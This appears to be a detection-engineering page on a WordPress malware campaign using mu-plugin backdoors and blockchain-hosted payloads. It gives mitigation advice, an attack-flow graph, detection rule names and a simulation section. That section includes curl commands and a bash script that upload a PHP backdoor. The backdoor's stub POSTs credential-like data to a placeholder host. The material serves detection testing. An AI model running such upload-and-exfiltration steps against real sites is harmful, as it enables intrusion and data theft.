Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
The report describes a new campaign that uses the ErrTraffic v3 tool to compromise WordPress sites by installing a mu‑plugin backdoor. The backdoor injects obfuscated JavaScript that retrieves additional payloads via a blockchain‑based EtherHiding technique. The final stage delivers OS‑specific malicious code, including an encrypted PowerShell payload, to victim browsers. Operational security mistakes such as hard‑coded keys expose the infrastructure.
Investigation
LevelBlue SpiderLabs examined the WordPress mu‑plugin backdoor, the embedded JavaScript beacon, and the ErrTraffic V3 control panel. They traced the use of static XOR keys, Base64 decoding, and smart‑contract calls to Polygon RPC nodes. The analysis also identified the hard‑coded authentication key used for API communication and mapped the hosting infrastructure across several bullet‑proof providers.
Mitigation
Defenders should remove the mu‑plugin backdoor, block known malicious TLDs and IP ranges, monitor for the hard‑coded API key usage, and restrict outbound connections to blockchain RPC endpoints. Regularly audit WordPress installations for unexpected mu‑plugins and validate file integrity. Deploy web‑application firewalls to detect the beaconing JavaScript patterns.
Response
Upon detection, isolate the affected web server, remove the backdoor files, and rotate all administrator credentials. Block the identified malicious domains and RPC endpoints at the network perimeter. Conduct a full forensic review to identify any downloaded payloads and monitor for continued C2 activity using the disclosed API token.
"graph TB %% Class definitions classDef action fill:#99ccff %% Node definitions step_initial_access["<b>Action</b> – <b>T1659 Content Injection</b><br/>Exploit WordPress site to upload malicious muu2011plugin (sessionu2011manager.php)"] class step_initial_access action step_persistence["<b>Action</b> – <b>T1671 Cloud Application Integration</b> / <b>T1525 Implant Internal Image</b><br/>Backdoor installed as a mustu2011use plugin running on every request"] class step_persistence action step_credential_access["<b>Action</b> – <b>T1056.003 Input Capture</b><br/>Injected JavaScript captures admin credentials and sends them to attacker"] class step_credential_access action step_c2["<b>Action</b> – <b>T1102.003 Web Service Oneu2011Way Communication</b><br/>Beacon sends visitor data via navigator.sendBeacon to attacker domains"] class step_c2 action step_obfuscation["<b>Action</b> – <b>T1027 Obfuscated Files</b><br/>Payloads encoded with Base64 and XOR, embedded in inline scripts"] class step_obfuscation action step_smart_contract["<b>Action</b> – <b>T1059.009 Cloud API</b><br/>Script queries Polygon RPC endpoints and smart contracts (EtherHiding) for URLs"] class step_smart_contract action step_dead_drop["<b>Action</b> – <b>T1102.001</b><br/>Uses blockchain as deadu2011drop for C2 configuration"] class step_dead_drop action step_encrypted["<b>Action</b> – <b>T1573.001 Symmetric Cryptography</b><br/>API traffic encrypted with AESu2011GCM or RC4 using hardu2011coded key"] class step_encrypted action step_execution["<b>Action</b> – <b>T1059.001 PowerShell</b><br/>Downloader creates temp directory, writes executable and fetches OSu2011specific payload"] class step_execution action step_priv_esc["<b>Action</b> – <b>T1546.016 Installer Packages</b><br/>PowerShell script registers as installer package to maintain foothold"] class step_priv_esc action %% Connections step_initial_access –>|leads to| step_persistence step_persistence –>|enables| step_credential_access step_credential_access –>|provides| step_c2 step_c2 –>|uses| step_obfuscation step_obfuscation –>|facilitates| step_smart_contract step_smart_contract –>|stores| step_dead_drop step_dead_drop –>|delivers| step_encrypted step_encrypted –>|supports| step_execution step_execution –>|enables| step_priv_esc "
Attack Flow
Detections
Suspicious Command Line Contains UNC Path with Executable as an Argument (via cmdline)
View
Possible ClickFix Attack Patterns In Command Line (via cmdline)
View
Possible Powershell Executing Process In Suspicious Directory (via cmdline)
View
Call Suspicious .NET Methods from Powershell (via powershell)
View
Possible Powershell Obfuscation Indicators (via powershell)
View
Possible Publicnode Ethereum Abuse Attempt As C2 Channel (via dns_query)
View
Suspicious Command and Control by Unusual Top Level Domain (TLD) DNS Request (via dns)
View
Detection of Obfuscated PowerShell Payload with Forced TLS 1.2 Usage [Windows Powershell]
View
Detection of Embedded JavaScript and WordPress Backdoor [Webserver]
View
Detection of ErrTraffic V3 Activity in Compromised WordPress Sites [Webserver]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands:
An attacker has compromised a WordPress admin account and uploads a malicious PHP file namedsession-manager.phpinto the webroot. The file contains a benign‑looking HTML section that ends with an inline<script>block whose comment reads “JavaScript embedded at the end of the section”. The script performs a stealthy data exfiltration to a cloud storage bucket (simulated via acurlPOST). No use ofnavigator.sendBeacon()is present, keeping the request within the rule’s detection window.- Upload malicious backdoor:
curl -u admin:password -F "file=@session-manager.php" "http://target.example.com/wp-admin/async-upload.php" - Trigger the backdoor (generates the detection‑triggering telemetry):
curl -s "http://target.example.com/wp-content/uploads/session-manager.php?cmd=exfiltrate"
- Upload malicious backdoor:
-
Regression Test Script:
#!/usr/bin/env bash # # Simulates uploading and invoking a malicious WordPress backdoor # that contains the exact phrase the Sigma rule watches for. # set -euo pipefail TARGET="http://target.example.com" ADMIN_USER="admin" ADMIN_PASS="password" # 1. Create the malicious PHP payload locally cat > session-manager.php <<'EOF' <?php // JavaScript embedded at the end of the section echo "<!DOCTYPE html><html><body>"; echo "<script>/* malicious code */</script>"; echo "</body></html>"; // Simple exfiltration stub (no sendBeacon) if ($_GET['cmd'] === 'exfiltrate') { $data = base64_encode('stolen_credentials'); $url = "https://malicious-storage.example.com/upload"; $options = array('http'=>array('method'=>"POST",'header'=>"Content-Type: application/x-www-form-urlencodedrn",'content'=>http_build_query(array('data'=>$data)))); $context = stream_context_create($options); file_get_contents($url, false, $context); } ?> EOF # 2. Upload the payload via WordPress’s async upload endpoint curl -s -u "${ADMIN_USER}:${ADMIN_PASS}" -F "file=@session-manager.php" "${TARGET}/wp-admin/async-upload.php" >/dev/null echo "[+] Uploaded malicious session-manager.php" # 3. Invoke the backdoor to generate detection‑visible traffic curl -s "${TARGET}/wp-content/uploads/session-manager.php?cmd=exfiltrate" >/dev/null echo "[+] Triggered backdoor – detection telemetry should now be present" # 4. Optional: pause for SIEM ingestion sleep 5 -
Cleanup Commands:
# Remove the malicious file from the server (requires admin SSH access) ssh admin@target.example.com "rm -f /var/www/html/wp-content/uploads/session-manager.php" echo "[+] Cleanup complete – backdoor removed"